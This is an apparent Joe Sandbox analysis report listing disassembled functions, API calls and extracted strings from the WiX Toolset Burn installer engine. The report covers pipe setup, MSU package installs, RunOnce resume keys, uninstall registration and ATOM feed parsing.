                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CreateErrorFileLastSleep
                                                                                                                                                                  • String ID: Failed to allocate name of parent cache pipe.$Failed to allocate name of parent logging pipe.$Failed to allocate name of parent pipe.$Failed to open companion process with PID: %u$Failed to open parent cache pipe: %ls$Failed to open parent logging pipe: %ls$Failed to open parent pipe: %ls$Failed to verify parent cache pipe: %ls$Failed to verify parent logging pipe: %ls$Failed to verify parent pipe: %ls$\\.\pipe\%ls$\\.\pipe\%ls.Cache$\\.\pipe\%ls.Log$d:\a\wix4\wix4\src\burn\engine\pipe.cpp
                                                                                                                                                                  • API String ID: 408151869-3514438494
                                                                                                                                                                  • Opcode ID: 2c92ab3f6b6d2157ad90c7a47861fdbce6bf59ac5e9ccb3091be57e86f4a382e
                                                                                                                                                                  • Instruction ID: b251839d0c62c6af6e428286fb3f20b0ae9902af59611a1a5df0f0823938fa59
                                                                                                                                                                  • Opcode Fuzzy Hash: 2c92ab3f6b6d2157ad90c7a47861fdbce6bf59ac5e9ccb3091be57e86f4a382e
                                                                                                                                                                  • Instruction Fuzzy Hash: 34712A36E81735B7E72166509C0AFAE6AAC9F44B24F110211FF14FA2D4D3B89D9097D1
                                                                                                                                                                  Function 00949A95 Relevance: 37.1, APIs: 3, Strings: 18, Instructions: 304COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetCurrentProcess.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00949AD9
                                                                                                                                                                    • Part of subcall function 0096BFC9: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process2,00916E9A,00000001,00916DEA,?,?,?,00977562,00000000), ref: 0096BFE1
                                                                                                                                                                    • Part of subcall function 0096BFC9: GetProcAddress.KERNEL32(00000000), ref: 0096BFE8
                                                                                                                                                                    • Part of subcall function 0096BFC9: GetLastError.KERNEL32(?,?,?,00977562,00000000), ref: 0096C010
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,00000000,?,?,?,00000000,00000000,00000000,?,?,?,?), ref: 00949DF5
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,00000000,?,?,?,00000000,00000000,00000000,?,?,?,?), ref: 00949E04
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to format MSU install command., xrefs: 00949C54
                                                                                                                                                                  • wusa.exe, xrefs: 00949B68
                                                                                                                                                                  • Failed to ensure WU service was enabled to install MSU package., xrefs: 00949D10
                                                                                                                                                                  • Failed to append log switch to MSU command-line., xrefs: 00949C8E
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\msuengine.cpp, xrefs: 00949AFD, 00949BE2, 00949D59
                                                                                                                                                                  • Failed to get action arguments for MSU package., xrefs: 00949B9B
                                                                                                                                                                  • "%ls" "%ls" /quiet /norestart, xrefs: 00949C40
                                                                                                                                                                  • Failed to get cached path for package: %ls, xrefs: 00949BD0
                                                                                                                                                                  • Failed to allocate WUSA.exe path., xrefs: 00949B7B
                                                                                                                                                                  • Failed to append SysNative directory., xrefs: 00949B31
                                                                                                                                                                  • Failed to append log path to MSU command-line., xrefs: 00949CBA
                                                                                                                                                                  • Failed to run MSU process, xrefs: 00949D47
                                                                                                                                                                  • WixBundleExecutePackageCacheFolder, xrefs: 00949BFB, 00949E1E
                                                                                                                                                                  • Failed to build MSU path., xrefs: 00949C20
                                                                                                                                                                  • SysNative\, xrefs: 00949B21
                                                                                                                                                                  • /log:, xrefs: 00949C7A
                                                                                                                                                                  • Failed to determine WOW64 status., xrefs: 00949AEB
                                                                                                                                                                  • Failed to find System32 directory., xrefs: 00949B50
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Handle$Close$AddressCurrentErrorLastModuleProcProcess
                                                                                                                                                                  • String ID: /log:$"%ls" "%ls" /quiet /norestart$Failed to allocate WUSA.exe path.$Failed to append SysNative directory.$Failed to append log path to MSU command-line.$Failed to append log switch to MSU command-line.$Failed to build MSU path.$Failed to determine WOW64 status.$Failed to ensure WU service was enabled to install MSU package.$Failed to find System32 directory.$Failed to format MSU install command.$Failed to get action arguments for MSU package.$Failed to get cached path for package: %ls$Failed to run MSU process$SysNative\$WixBundleExecutePackageCacheFolder$d:\a\wix4\wix4\src\burn\engine\msuengine.cpp$wusa.exe
                                                                                                                                                                  • API String ID: 1400713077-1245678217
                                                                                                                                                                  • Opcode ID: fd690fcd7daa370a184ef6054466dd58a92e61318aa378e7dc3e98383e39bf2c
                                                                                                                                                                  • Instruction ID: 637a1775d26f74b366202a06db19f399ff3d60dba9b512db1f6eae7e6fae85cc
                                                                                                                                                                  • Opcode Fuzzy Hash: fd690fcd7daa370a184ef6054466dd58a92e61318aa378e7dc3e98383e39bf2c
                                                                                                                                                                  • Instruction Fuzzy Hash: 27A1A231E80219BBEF229B98CC46FEF7A79AF44715F110161FA04BA2D0D7B59D90DB90
                                                                                                                                                                  Function 00956421 Relevance: 37.0, APIs: 6, Strings: 15, Instructions: 295COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00975CB8: UuidCreate.RPCRT4(?), ref: 00975CDB
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,00000000,08000000,00000000,00000000,?,?,?,?,?), ref: 009567B4
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,00000000,08000000,00000000,00000000,?,?,?,?,?), ref: 009567CD
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseHandle$CreateUuid
                                                                                                                                                                  • String ID: %ls$%ls /pipe %ls$Failed to CreateProcess on path: %ls$Failed to allocate event name.$Failed to allocate section name.$Failed to append netfx chainer args.$Failed to append user args.$Failed to create netfx chainer guid.$Failed to create netfx chainer.$Failed to get netfx return code.$Failed to process netfx chainer message.$Failed to wait for netfx chainer process to complete$NetFxEvent.%ls$NetFxSection.%ls$d:\a\wix4\wix4\src\burn\engine\netfxchainer.cpp
                                                                                                                                                                  • API String ID: 264999607-3586658835
                                                                                                                                                                  • Opcode ID: 7b97017810f6c757a464a061821c74d9d8a698193ef36dd7e9beb59912e8daed
                                                                                                                                                                  • Instruction ID: f323b3ee1973d67d21535123cb1402d56158356163c86a64973db14caad757c7
                                                                                                                                                                  • Opcode Fuzzy Hash: 7b97017810f6c757a464a061821c74d9d8a698193ef36dd7e9beb59912e8daed
                                                                                                                                                                  • Instruction Fuzzy Hash: A0A1AF31E40328ABDF21DBA5CD46FDE7BB8AB48715F504154F908FB291E6B49D88CB90
                                                                                                                                                                  Function 0094180C Relevance: 37.0, APIs: 4, Strings: 17, Instructions: 261COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: Action$Addon$Detect$Failed to get @Action.$Failed to get @Id.$Failed to get RelatedBundle element count.$Failed to get RelatedBundle nodes$Failed to get next RelatedBundle element.$Failed to resize Addon code array$Failed to resize Detect code array$Failed to resize Patch code array$Failed to resize Upgrade code array$Invalid value for @Action: %ls$Patch$RelatedBundle$Upgrade$d:\a\wix4\wix4\src\burn\engine\bundlepackageengine.cpp
                                                                                                                                                                  • API String ID: 0-738192170
                                                                                                                                                                  • Opcode ID: 5d2bba6d974fabe8a7a9bc837da6d604a67586955ab9a5fdbdcfe7511ec77b07
                                                                                                                                                                  • Instruction ID: cf95f0380ce781203eb4c0ef9802c62d349e952eb666d95815f5009cf6f71a43
                                                                                                                                                                  • Opcode Fuzzy Hash: 5d2bba6d974fabe8a7a9bc837da6d604a67586955ab9a5fdbdcfe7511ec77b07
                                                                                                                                                                  • Instruction Fuzzy Hash: 1491BF31B84209BBDF11DF84CC46FAE7B76ABC9B28F214154F6157B2D0EAB09981DB10
                                                                                                                                                                  Function 0091C989 Relevance: 35.5, APIs: 7, Strings: 13, Instructions: 496COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetStringTypeW.KERNEL32(00000001,?,00000001,?,00000018,?,00000000,00000000), ref: 0091C9C4
                                                                                                                                                                  • GetStringTypeW.KERNEL32(00000001,?,00000001,00000048), ref: 0091CBEA
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: StringType
                                                                                                                                                                  • String ID: -$AND$Failed to parse condition "%ls". Constant too big, at position %d.$Failed to parse condition "%ls". Identifier cannot start at a digit, at position %d.$Failed to parse condition "%ls". Invalid version format, at position %d.$Failed to parse condition "%ls". Unexpected '~' operator at position %d.$Failed to parse condition "%ls". Unexpected character at position %d.$Failed to parse condition "%ls". Unterminated literal at position %d.$Failed to set symbol value.$H$NOT$Symbol was too long: %ls$d:\a\wix4\wix4\src\burn\engine\condition.cpp
                                                                                                                                                                  • API String ID: 4177115715-673032140
                                                                                                                                                                  • Opcode ID: d0811ce3f057cb031d42c2a34059878f10cb9e0b657bfbf4aef818e219a2fb15
                                                                                                                                                                  • Instruction ID: 7a72cf7f0034770c3590763fe8c7202c9889903b68e961ef2e6e4e567ca6a9d2
                                                                                                                                                                  • Opcode Fuzzy Hash: d0811ce3f057cb031d42c2a34059878f10cb9e0b657bfbf4aef818e219a2fb15
                                                                                                                                                                  • Instruction Fuzzy Hash: 6F02E0B1780309BADB258F54CC8AFFA7A69FB04B04F108946F9159E2C1D3B5DAD1D790
                                                                                                                                                                  Function 00927A4E Relevance: 35.2, APIs: 3, Strings: 17, Instructions: 213registryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,?,SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce,00020006,00000000), ref: 00927CDA
                                                                                                                                                                    • Part of subcall function 0096D789: RegSetValueExW.ADVAPI32(?,00927A20,00916CF2,EstimatedSize,000000FF,00916CF2,00000000,?,00929AF0,00000000,00000390,000000F8,00916CF2,009331C1,00000000,00000000), ref: 0096D7AD
                                                                                                                                                                  • RegDeleteValueW.ADVAPI32(00000000,?,?,SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce,00020006,00000000), ref: 00927C1F
                                                                                                                                                                  • RegDeleteValueW.ADVAPI32(009331C1,BundleResumeCommandLine,?,SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce,00020006,00000000), ref: 00927C6F
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Value$Delete$Close
                                                                                                                                                                  • String ID: "%ls" /%ls /%ls$BundleResumeCommandLine$Failed to create run key.$Failed to delete resume command line value.$Failed to delete run key value.$Failed to format resume command line for RunOnce.$Failed to open run key.$Failed to write Installed value.$Failed to write Resume value.$Failed to write resume command line value.$Failed to write run key value.$Installed$Resume$SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce$burn.clean.room$burn.runonce$d:\a\wix4\wix4\src\burn\engine\registration.cpp
                                                                                                                                                                  • API String ID: 1871269255-1559682262
                                                                                                                                                                  • Opcode ID: a157caee108aac3c0e4acb9a0909fdf94c2473021dabd8b5196a6cf954ed8b96
                                                                                                                                                                  • Instruction ID: 9d885391b2e13cfd16ddae23107a582475ec5e93e573858d4e68fa0398463272
                                                                                                                                                                  • Opcode Fuzzy Hash: a157caee108aac3c0e4acb9a0909fdf94c2473021dabd8b5196a6cf954ed8b96
                                                                                                                                                                  • Instruction Fuzzy Hash: DF516B32B89735B7EB21AAE0EC4BFBFE918AF40B15F110014BE01763D0E6A49D4097E5
                                                                                                                                                                  Function 009504DF Relevance: 31.8, APIs: 2, Strings: 16, Instructions: 347threadCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetExitCodeThread.KERNEL32(?,00000160,00000001,00916CF2,00000000,000000FF,00916DA2,00000000,000000B0,00916CF2,00916CF2,009330D0,00000160,?,00916DA2), ref: 009505A1
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 009505AF
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to execute EXE package., xrefs: 00950684
                                                                                                                                                                  • Failed to execute BUNDLE package., xrefs: 0095064C
                                                                                                                                                                  • d:\a\wix4\wix4\src\burn\engine\apply.cpp, xrefs: 009505D3, 009505D9, 009505ED, 00950850, 0095085B, 00950878, 009508C4
                                                                                                                                                                  • Failed to execute MSI package., xrefs: 009506BD
                                                                                                                                                                  • Failed to execute commit MSI transaction action., xrefs: 009507EF
                                                                                                                                                                  • Failed to execute begin MSI transaction action., xrefs: 009507C2
                                                                                                                                                                  • Failed to execute MSU package., xrefs: 00950737
                                                                                                                                                                  • Cache thread exited unexpectedly with exit code: %u., xrefs: 00950866
                                                                                                                                                                  • Invalid execute action., xrefs: 009508AB
                                                                                                                                                                  • Failed to execute related bundle., xrefs: 00950614
                                                                                                                                                                  • Failed to wait for cache check-point., xrefs: 00950883
                                                                                                                                                                  • Failed to get cache thread exit code., xrefs: 009505DF
                                                                                                                                                                  • Failed to execute package provider registration action., xrefs: 00950764
                                                                                                                                                                  • Failed to execute MSP package., xrefs: 009506F6
                                                                                                                                                                  • Failed to execute uninstall MSI compatible package., xrefs: 00950897
                                                                                                                                                                  • Failed to execute dependency action., xrefs: 00950791
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CodeErrorExitLastThread
                                                                                                                                                                  • String ID: Cache thread exited unexpectedly with exit code: %u.$Failed to execute BUNDLE package.$Failed to execute EXE package.$Failed to execute MSI package.$Failed to execute MSP package.$Failed to execute MSU package.$Failed to execute begin MSI transaction action.$Failed to execute commit MSI transaction action.$Failed to execute dependency action.$Failed to execute package provider registration action.$Failed to execute related bundle.$Failed to execute uninstall MSI compatible package.$Failed to get cache thread exit code.$Failed to wait for cache check-point.$Invalid execute action.$d:\a\wix4\wix4\src\burn\engine\apply.cpp
                                                                                                                                                                  • API String ID: 1352145401-3642936599
                                                                                                                                                                  • Opcode ID: f6e2bbd9cc8ca45d393df54ccb314664a6ef9583edbcfb5edb0afd3984f1c2ef
                                                                                                                                                                  • Instruction ID: 1ac1a5a067e9d88c99e6b8f576ceb5499a32bc32114d2c429b7cb2c66e97af51
                                                                                                                                                                  • Opcode Fuzzy Hash: f6e2bbd9cc8ca45d393df54ccb314664a6ef9583edbcfb5edb0afd3984f1c2ef
                                                                                                                                                                  • Instruction Fuzzy Hash: C2B18531A4121ABBEF11CE56CC46FAF7B78EB85B55F110065BE04BA2D1E2B19D44CBE0
                                                                                                                                                                  Function 009791C4 Relevance: 31.8, APIs: 6, Strings: 12, Instructions: 254COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0097943E
                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to process all ATOM category elements., xrefs: 009793F3
                                                                                                                                                                  • scheme, xrefs: 00979275
                                                                                                                                                                  • Failed to allocate ATOM category scheme., xrefs: 009792A0
                                                                                                                                                                  • label, xrefs: 00979233
                                                                                                                                                                  • Failed get attributes on ATOM unknown element., xrefs: 009791F7
                                                                                                                                                                  • Failed to parse unknown ATOM category element: %ls, xrefs: 00979414
                                                                                                                                                                  • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\atomutil.cpp, xrefs: 00979206, 00979402, 00979423
                                                                                                                                                                  • Failed to get child nodes of ATOM category element., xrefs: 00979372
                                                                                                                                                                  • term, xrefs: 009792B6
                                                                                                                                                                  • Failed to allocate ATOM category label., xrefs: 0097925F
                                                                                                                                                                  • Failed to allocate ATOM category term., xrefs: 00979341
                                                                                                                                                                  • Failed to process all ATOM category attributes., xrefs: 0097932D
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FreeString
                                                                                                                                                                  • String ID: Failed get attributes on ATOM unknown element.$Failed to allocate ATOM category label.$Failed to allocate ATOM category scheme.$Failed to allocate ATOM category term.$Failed to get child nodes of ATOM category element.$Failed to parse unknown ATOM category element: %ls$Failed to process all ATOM category attributes.$Failed to process all ATOM category elements.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\atomutil.cpp$label$scheme$term
                                                                                                                                                                  • API String ID: 3341692771-530868315
                                                                                                                                                                  • Opcode ID: 46e6e02da022112901a25e341c695f4df513eef55c104f98bcbb3a66185d0c31
                                                                                                                                                                  • Instruction ID: 072c0e2bb9b84a4eba48f941be7e7e3b2afc592989b454e91c8de38c1ca34aff
                                                                                                                                                                  • Opcode Fuzzy Hash: 46e6e02da022112901a25e341c695f4df513eef55c104f98bcbb3a66185d0c31
                                                                                                                                                                  • Instruction Fuzzy Hash: 7E81F432A44218FBDF019B94CC4AFAE7779EBC4B24F208195F619B72E1DB709A41DB50
                                                                                                                                                                  Function 00929489 Relevance: 31.7, APIs: 1, Strings: 17, Instructions: 236COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: "%ls" /%ls /uninstall /quiet$Comments$Contact$Failed to delete %ls value.$Failed to write %ls value.$HelpLink$HelpTelephone$NoModify$NoRemove$ParentDisplayName$ParentKeyName$QuietUninstallString$SystemComponent$URLInfoAbout$URLUpdateInfo$burn.clean.room$d:\a\wix4\wix4\src\burn\engine\registration.cpp
                                                                                                                                                                  • API String ID: 0-3056233166
                                                                                                                                                                  • Opcode ID: 5f7e00be9e09abbbb20f0dab1f122d8d796322397236977f344bf3b720ae9917
                                                                                                                                                                  • Instruction ID: a3029dcb02c2beebf5ee4b3639aab55b405bc7d63668d300e80a30e51322545a
                                                                                                                                                                  • Opcode Fuzzy Hash: 5f7e00be9e09abbbb20f0dab1f122d8d796322397236977f344bf3b720ae9917
                                                                                                                                                                  • Instruction Fuzzy Hash: 2F61B131FC5375B2DB3269569C4EFAB6DA89B86F14F250060BE047F3D99AA0DD40C7A0
                                                                                                                                                                  Function 00979491 Relevance: 30.0, APIs: 5, Strings: 12, Instructions: 245COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 009796EC
                                                                                                                                                                  Strings
                                                                                                                                                                  • url, xrefs: 0097953E
                                                                                                                                                                  • crypt32.dll, xrefs: 00979627
                                                                                                                                                                  • Failed to parse unknown ATOM content element: %ls, xrefs: 00979695
                                                                                                                                                                  • Failed to allocate ATOM content value., xrefs: 009796C6
                                                                                                                                                                  • type, xrefs: 00979500
                                                                                                                                                                  • Failed to allocate ATOM content scheme., xrefs: 009795C9
                                                                                                                                                                  • Failed get attributes on ATOM unknown element., xrefs: 009794C4
                                                                                                                                                                  • Failed to process all ATOM content elements., xrefs: 00979681
                                                                                                                                                                  • d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\atomutil.cpp, xrefs: 009794D3, 009796A4, 009796D5
                                                                                                                                                                  • Failed to get child nodes of ATOM content element., xrefs: 009795FA
                                                                                                                                                                  • Failed to process all ATOM content attributes., xrefs: 009795B5
                                                                                                                                                                  • Failed to allocate ATOM content type., xrefs: 00979528
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000001.00000002.1489653220.0000000000911000.00000020.00000001.01000000.00000003.sdmp, Offset: 00910000, based on PE: true
                                                                                                                                                                  • Associated: 00000001.00000002.1489628230.0000000000910000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489717022.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489752425.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000001.00000002.1489778440.00000000009B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_1_2_910000_kXzODlqJak.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FreeString
                                                                                                                                                                  • String ID: Failed get attributes on ATOM unknown element.$Failed to allocate ATOM content scheme.$Failed to allocate ATOM content type.$Failed to allocate ATOM content value.$Failed to get child nodes of ATOM content element.$Failed to parse unknown ATOM content element: %ls$Failed to process all ATOM content attributes.$Failed to process all ATOM content elements.$crypt32.dll$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\atomutil.cpp$type$url
                                                                                                                                                                  • API String ID: 3341692771-2309346703
                                                                                                                                                                  • Opcode ID: 21c670860232efdaa59ddff5fd26ee63262233af8afa8fe1d11453a3014da05c
                                                                                                                                                                  • Instruction ID: a814c77a83853665580895b88d9ffd5e10eabc0da441fecab4d09ba1453bc034
                                                                                                                                                                  • Opcode Fuzzy Hash: 21c670860232efdaa59ddff5fd26ee63262233af8afa8fe1d11453a3014da05c
                                                                                                                                                                  • Instruction Fuzzy Hash: 7881F536A44218FBDF05DB94CC0AFAE7779EF84B24F118199F519AB2D0EB709A40DB50
                                                                                                                                                                  Function 0092C2ED Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 197pipesleepstringCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • lstrlenW.KERNEL32(0001C580,009173DE,00000000,00916CF2,00009002,?,000000B0,00000000,00000000,000000B0,?,?,00916CF2,00000000,00000000), ref: 0092C320
                                                                                                                                                                  • GetCurrentProcessId.KERNEL32(?,?,00916CF2,00000000,00000000), ref: 0092C32B
